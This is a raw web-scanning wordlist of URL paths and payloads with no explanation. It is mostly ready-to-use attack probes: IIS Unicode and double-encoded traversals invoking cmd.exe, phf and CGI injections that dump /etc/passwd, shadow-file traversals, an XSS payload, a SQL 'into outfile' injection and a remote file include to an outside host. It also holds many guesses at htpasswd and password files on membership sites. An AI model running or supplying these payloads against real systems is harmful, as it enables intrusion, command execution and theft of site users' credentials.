!admin!
#NAME?
$cgibin$/passwords
$data
$DATA
$memdir$/htpasswd
$SIGNUP_LOG
%00
%23data%23
%23db1
%23ewebeditor
%23newasp
%2E%2E
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
%2ehtaccess
%2eHTACCESS
%2ehtpasswd
%2f%2e%2e%2fcgi-bin
%Ehtdocs
%Elog
%Elogs
%Eofs
%Etemp
%Etmp
%Eweb00
%Eweb800
***
*.jsp::$DATA
.""./.""./Perl/eg/core/findtar
."./."./Perl/eg/core/findtar
............winntsystem32cmd.exe?/c+
....../......ida/con
....../all
....../etc/hosts
../../../..
../../../../../../winnt/system32/cmd.exe?/c+
../../../../all
../../../../etc/hosts
../../Perl/eg/core/findtar
../../shadow
../admin
../admin/default
../admin/index
../admin/login
../admin/manage
../web-inf
..default
..index
..login
..manage
./admin
./web-inf
./WEB-INF
.htpasswdwebbin/passwd/p1/htpasswddb
.jpilot
.jpilot/^/.jpilot
.mdb
.passwords/htpasswd
:2301/survey
:8765/example
?m=a
?pageservices
?PageServices
?s=d
?wp-html-rend
[ADMIN_LOGIN]
_AuthChangeUrl?
_head.php?_zb_path=http:/thehost.net/a
_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:;
_mem_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir;
_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
_mem_bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
_privat/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
_privat/ana-bin/sitehtpass/heathersplace.com/htpass-members
_privat/cgi-bin/am/codes/htpasswd
_privat/cgi-bin/database/passwords
_privat/cgi-bin/fratboys/passwords
_privat/cgi-bin/ib/data/htpasswd
_privat/cgi-bin/mastergate/passwords
_privat/cgi-bin/passwords
_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
_vti_bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
_vti_bin/shtml.dll/_vti_rpc
_vti_cnf/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
_vti_cnf/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
_vti_pvt/administrators.pwd/cgi-bin/view-source
_vti_pvt/administrators.pwdgi-bin/view-source
_vti_pvt/authors.pwdgi-bin/view-source?../../../../../../../etc/passwd
~
~access
~adm
~admin
~admin1
~administrator
~aglimpse
~asia/alibill/passwords
~auntfani
~auth
~bin
~ccbill
~cgi
~cgi-bin
~Cgi-bin
~cgi-bin/aglimpse
~cgi-bin/authorizenet.cgi
~cgi-bin/phf*
~cgi-local
~cgi-win
~dat
~data
~database
~dev
~dmr
~dmr1
~epoch
~etc
~freshteen
~ftp
~guest
~home
~htaccess
~htdata
~html
~htpasswd
~htpasswrd
~htsdata
~ibill
~lancelot
~lcgi-bin
~log
~log/mastergate
~logs
~logs/memberfile
~lp
~member
~misc
~mk
~mk_output
~mnt
~msbill
~named
~netbilling
~nobody
~nobody/etc
~obs
~ofs
~oracle
~passwd
~passwrd
~pre
~pub
~rollo
~rollo/members
~rollo/members/.htpasswd_privat
~rollo/members/admin/db/htpasswd
~rollo/members/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
~rollo/members/ana-bin/sitehtpass/heathersplace.com/htpass-members
~rollo/members/cgi-bin/am/codes/htpasswd
~rollo/members/cgi-bin/database/passwords
~rollo/members/cgi-bin/fratboys/passwords
~rollo/members/cgi-bin/ib/data/htpasswd
~rollo/members/cgibin/mastergate/passwords
~rollo/members/cgibin/passwords
~rollo/members/cgi-bin/passwords
~rollo/members/data/passwdfile
~root
~root/etc/passwd
~sbin
~stat
~stats
~sys
~sys~
~temp
~test
~tmp
~userdb
~usr
~uucp
~var
~web00
~Web2000
~web800
~web800fo
~web900
~webcash
~widenet
~wnu
~work
~wwwjoin
+
++
+++++++++++++++++++++<td>
<script>alert('can+cross+site+attack')</script>
0admin/login{ext}
0manager/admin{ext}
11111/index{ext}
20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
2600-cgi/ezmlm-cgi
631/admin/?op=%c0
7273/?dellopenmanage
800/../..
800/C:
8000/./WEB-INF
8000/cgi/wja?page=wja
801/../../../../../../../../etc/hosts
8010/....
8010/c:
8010/d:
8010/Guide/../../../../../../../../../../../../../../../etc/shadow
8080/../examples/WEB-INF/../../../../..
8080/tea/dynamic/system/teaservlet/Admin?admin=true
8100/WEB-INF
8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
8888/ab2/@Ab2Admin
8888/cgi-bin/admin/admin
8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
8888/SimpleBar.dll/RunReport
88888/index{ext}
8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
9000/cgi-bin/query%3f
a_main{ext}
aaa{ext}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<!--htmltags-->
about:blank
access/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
access/ana-bin/sitehtpass/heathersplace.com/htpass-members
access/cgi-bin/am/codes/htpasswd
access/cgi-bin/database/passwords
access/cgi-bin/fratboys/passwords
access/cgi-bin/ib/data/htpasswd
access/cgi-bin/mastergate/passwords
access/cgi-bin/passwords
access-log
account{ext}
acct/login{ext}
acctman/info/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
acctman/info/cgi-bin/am/codes/htpasswd
acctman/info/cgi-bin/database/passwords
acctman/info/cgi-bin/fratboys/passwords
acctman/info/cgi-bin/ib/data/htpasswd
acctman/info/cgi-bin/mastergate/passwords
acctman/info/cgi-bin/passwords
Actcms.mdb/Data_ACT
a-d
AD%23YL029House
ad.cgi?file=../../../../../../../../etc/hosts
ad_admin/admin_login{ext}
ad_login{ext}
ad_manage{ext}
ad{ext}
ad-01
ad-02
add_admin{ext}
add{ext}
addfile{ext}
addlb{ext}
addmember{ext}
adduser{ext}
adm@in
adm_login{ext}
adm_user{ext}
adm{ext}
Admin%40casd
admin%5F
admin%5Fshopxp
admin/?op=%c0
admin/account{ext}
admin/add{ext}
admin/adm_menu{ext}
admin/admin_6list{ext}
admin/admin_backup{ext}
admin/Admin_Login{ext}
admin/admin_upfile{ext}
admin/admin{ext}
admin/browse.asp?FilePath=c:/&Opt=2&level=0
admin/chkfile{ext}
admin/chkpic{ext}
admin/config{ext}
admin/controlpanel{ext}
admin/cp{ext}
admin/data/user{ext}
admin/db/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
admin/db/ana-bin/sitehtpass/heathersplace.com/htpass-members
admin/db/cgi-bin/am/codes/htpasswd
admin/db/cgi-bin/database/passwords
admin/db/cgi-bin/fratboys/passwords
admin/db/cgi-bin/ib/data/htpasswd
admin/db/cgi-bin/mastergate/passwords
admin/db/cgi-bin/passwords
admin/default/admin{ext}
admin/default/login{ext}
admin/default{ext}
admin/delepic{ext}
admin/delete{ext}
admin/delfile{ext}
admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=D:/webspace/opendnsserver/target/target.com/db/../../../..
admin/editfile{ext}
admin/editpic{ext}
admin/ewebeditor/admin_login{ext}
admin/ewebeditor2.8
admin/getpic{ext}
admin/home{ext}
admin/import/imp_rootdir.asp?result=1&www=C:/&ftp=C:/&owwwPath=C:/&oftpPath=C:
admin/index{ext}
admin/login{ext}
admin/manage/admin{ext}
admin/manage/login{ext}
admin/manage{ext}
admin/new{ext}
admin/news{ext}
admin/pic{ext}
admin/Select_feedback{ext}
admin/sendfile{ext}
admin/sndfile{ext}
admin/upfile{ext}
admin/upload{ext}
admin/uploadfaceok{ext}
admin/uploads{ext}
admin/uppic{ext}
admin/user{ext}
admin/wo%5Fedit
admin/wo%5Fedit/editor
admin/wo%5Fedit/editor/filemanager
admin_admin{ext}
Admin_BatchLink{ext}
admin_del{ext}
admin_delete{ext}
admin_edit{ext}
admin_go{ext}
admin_index{ext}
admin_login/admin{ext}
admin_login/login{ext}
admin_login{ext}
admin_main{ext}
Admin_main-1
admin_pass{ext}
Admin_SoftInfo{ext}
admin_upfile{ext}
admin_user{ext}
admin_yuzhiguo/login{ext}
admin{ext}
admin=anything
admin1{ext}
admin2{ext}
admin3{ext}
admin4{ext}
admin666{ext}
admin888{ext}
admin999{ext}
adminadduser{ext}
admincontrol{ext}
admindel{ext}
admindelete{ext}
adminedit{ext}
administr8{ext}
administration{ext}
administrator/account{ext}
administrator/admin{ext}
administrator/index{ext}
administrator/login{ext}
administrator{ext}
adminjoin{ext}
adminlogin{ext}
admin-ls
AdminMain{ext}
adminmember{ext}
adminpanel{ext}
admins{ext}
admin-serv/config/admpw
admintab{ext}
adminuser{ext}
adminuserlogin{ext}
adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
adsamples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
adsystem/index{ext}
adult/members/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
adult/members/ana-bin/sitehtpass/heathersplace.com/htpass-members
adult/members/cgi-bin/am/codes/htpasswd
adult/members/cgi-bin/database/passwords
adult/members/cgi-bin/fratboys/passwords
adult/members/cgi-bin/ib/data/htpasswd
adult/members/cgi-bin/mastergate/passwords
adult/members/cgi-bin/passwords
af../winnt/system32/cmd.exe?/c+dir
aHR0cDovL2F1dG8uMTYzLmNvbS8=
alai8890%23%23
allinurl:image
amateurs/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
amateurs/ana-bin/sitehtpass/heathersplace.com/htpass-members
amateurs/cgi-bin/am/codes/htpasswd
amateurs/cgi-bin/database/passwords
amateurs/cgi-bin/fratboys/passwords
amateurs/cgi-bin/ib/data/htpasswd
amateurs/cgi-bin/mastergate/passwords
amateurs/cgi-bin/passwords
amd/index{ext}
amd/login{ext}
amd/super{ext}
amd_007/admin{ext}
amd_007/index{ext}
amd_007/login{ext}
amd_007/super{ext}
ana-bin
ana-bin/sitehtpass
ana-bin/sitehtpass/admin/db/htpasswd
ana-bin/sitehtpass/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
ana-bin/sitehtpass/ana-bin/sitehtpass/heathersplace.com/htpass-members
ana-bin/sitehtpass/cgi-bin/am/codes/htpasswd
ana-bin/sitehtpass/cgi-bin/database/passwords
ana-bin/sitehtpass/cgi-bin/fratboys/passwords
ana-bin/sitehtpass/cgi-bin/ib/data/htpasswd
ana-bin/sitehtpass/cgi-bin/mastergate/passwords
ana-bin/sitehtpass/cgibin/passwords
ana-bin/sitehtpass/cgi-bin/passwords
ana-bin/sitehtpass/control/member_htpasswd
ana-bin/sitehtpass/europemodel.com/htpass-bluebird
ana-bin/sitehtpass/heathersplace.com/htpass-members
anna-diana
anna-diane
anna-maria
anne-corinne
anne-marie
ann-marie
ans.pl?p=../../../../bin/ls|&blah
arealist-1
art{ext}
article/admin/admin{ext}
article{ext}
ask-qq-img
asp-bin
asp-bin/_DataBase
asp-bin/htmledit
asp-bin/manage
ats/logs/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
ats/logs/ana-bin/sitehtpass/heathersplace.com/htpass-members
ats/logs/cgi-bin/am/codes/htpasswd
ats/logs/cgi-bin/database/passwords
ats/logs/cgi-bin/fratboys/passwords
ats/logs/cgi-bin/ib/data/htpasswd
ats/logs/cgi-bin/mastergate/passwords
ats/logs/cgi-bin/passwords
auth/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
auth/ana-bin/sitehtpass/heathersplace.com/htpass-members
auth/cgi-bin/am/codes/htpasswd
auth/cgi-bin/database/passwords
auth/cgi-bin/fratboys/passwords
auth/cgi-bin/ib/data/htpasswd
auth/cgi-bin/mastergate/passwords
auth/cgi-bin/passwords
auth/members/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
auth/members/ana-bin/sitehtpass/heathersplace.com/htpass-members
auth/members/cgi-bin/am/codes/htpasswd
auth/members/cgi-bin/database/passwords
auth/members/cgi-bin/fratboys/passwords
auth/members/cgi-bin/ib/data/htpasswd
auth/members/cgi-bin/mastergate/passwords
auth/members/cgi-bin/passwords
a-z
back/login{ext}
backup{ext}
baixin-file
barbara-anne
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
base{ext}
baseconn{ext}
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah
bbs/admin_index{ext}
bbs/admin_login{ext}
bbs/boke/data/dvboke{ext}
bbs/cgi-bin
bbs/data/dvboke{ext}
bbs/diy{ext}
bbs/down_addsoft{ext}
bbs/down_picupfile{ext}
bbs/down_picupload{ext}
bbs/DV_plus/marry/update{ext}
bbs/fdnews{ext}
bbs/login{ext}
bbs/post_upfile{ext}
bbs/post_upfile1{ext}
bbs/post_upload{ext}
bbs/post_upload1{ext}
bbs/reg_upload{ext}
bbs/reg_upload1{ext}
bbs/saveup{ext}
bbs/saveup1{ext}
bbs/update{ext}
bbs/upfile{ext}
bbs/upfile1{ext}
bbs/upload_soft{ext}
bbs/z_visual_upfile{ext}
bbs-Admin
bbs-adminM
bbscgi-bin
bbs-data
bestcollegepicks/login{ext}
bette-ann
biay-che
bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:;
bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
bin/igate/search.cgi
bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
bin/scripts/......../winnt/system32/cmd.exe?/c+dir
bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir
blog/upfile{ext}
board/_head.php?_zb_path=http:/thehost.net/a
boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=
boke/data/dvboke{ext}
bor-wen
boss/admin{ext}
browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
bugzilla/long_list.cgi?buglist=1%20into%20outfile%20%27/tmp/pussycat%27
c/cmd.exe?/c+dir
c/inetpub/scripts/root.exe?/c+dir
c/root.exe?/c+dir
c/s.dll/pagelog.cgi?display=../../../../tmp/a
c/winnt/system32/cmd.exe?/c+dir
c:
cache-stats
calendar-cn
calendar-de
calendar-en
calendar-zh
careerfocus/Login{ext}
carol-jean
caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/serversource=/caspsamp/../admin/logs/server
caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000^/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
cate-all
ccbil/cgibin/ibp/search.cgi
ccbill/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
ccbill/ana-bin/sitehtpass/heathersplace.com/htpass-members
ccbill/cgi-bin/am/codes/htpasswd
ccbill/cgi-bin/database/passwords
ccbill/cgi-bin/fratboys/passwords
ccbill/cgi-bin/ib/data/htpasswd
ccbill/cgi-bin/mastergate/passwords
ccbill/cgi-bin/passwords
ccbill/local-cgi
ccbill/local-cgi?nmd=MENU
ccbill/male/password/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
ccbill/male/password/ana-bin/sitehtpass/heathersplace.com/htpass-members
ccbill/male/password/cgi-bin/am/codes/htpasswd
ccbill/male/password/cgi-bin/database/passwords
ccbill/male/password/cgi-bin/fratboys/passwords
ccbill/male/password/cgi-bin/ib/data/htpasswd
ccbill/male/password/cgi-bin/mastergate/passwords
ccbill/male/password/cgi-bin/passwords
ccbill/members/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
ccbill/members/ana-bin/sitehtpass/heathersplace.com/htpass-members
ccbill/members/cgi-bin/am/codes/htpasswd
ccbill/members/cgi-bin/database/passwords
ccbill/members/cgi-bin/fratboys/passwords
ccbill/members/cgi-bin/ib/data/htpasswd
ccbill/members/cgi-bin/mastergate/passwords
ccbill/members/cgi-bin/passwords
ccbill/password/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
ccbill/password/ana-bin/sitehtpass/heathersplace.com/htpass-members
ccbill/password/cgi-bin/am/codes/htpasswd
ccbill/password/cgi-bin/database/passwords
ccbill/password/cgi-bin/fratboys/passwords
ccbill/password/cgi-bin/ib/data/htpasswd
ccbill/password/cgi-bin/mastergate/passwords
ccbill/password/cgi-bin/passwords
ccbill/secure/ana-bin/sitehtpass/europemodel.com/htpass-bluebird
ccbill/secure/ana-bin/sitehtpass/heathersplace.com/htpass-members
ccbill/secure/ccbill.log%20
ccbill/secure/cgi-bin/am/codes/htpasswd
ccbill/secure/cgi-bin/database/passwords
ccbill/secure/cgi-bin/fratboys/passwords
ccbill/secure/cgi-bin/ib/data/htpasswd
ccbill/secure/cgi-bin/mastergate/passwords
ccbill/secure/cgi-bin/passwords
ccc.exe?/c+dir
Ce-Admins
cg-bin
cg-bini
cgi/%7Ecgi-win
cgi/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
cgi/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi/~cgi-win
cgi/bin/test.txt;%20/bin/ls
cgi/campas?%0a/bin/cat%0a/etc/passwd
cgi/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
cgi/handler/useless_shit;cat/t/etc/passwd|
cgi/htmlscript?../../../../etc/passwd
cgi/nph-test-cgi
cgi/phf?qalias=x%0a/bin/cat%20/etc/passwd
cgi/phf?qname=root%0acat%20/etc/passwd
cgi/php.cgi?/etc/passwd
cgi/test-cgi
cgi/view-source
cgi/view-source?../../../../../../../etc/passwd
cgi/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
cgi/www-sql
cgi_bin/guanli-cn
cgi_bin/law.com/admin_article/admin_login
cgi-bin
Cgi-bin
cgi-bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
cgi-bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
cgi-bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:
cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^
cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:
cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
cgi-bin/............winntsystem32cmd.exe?/c+dir+c:
cgi-bin/............winntsystem32cmd.exe?/c+dir+c:bin/............winntsystem32cmd.exe?/c+dir+c:;
cgi-bin/_privat
cgi-bin/_vti_pvt
cgi-bin/~logs/mastergate
cgibin/~rollo
cgi-bin/~rollo
cgibin/~root
cgi-bin/~root
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/hosts
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/hosts
cgi-bin/a1disp3.cgi?/../../../../../../etc/hosts
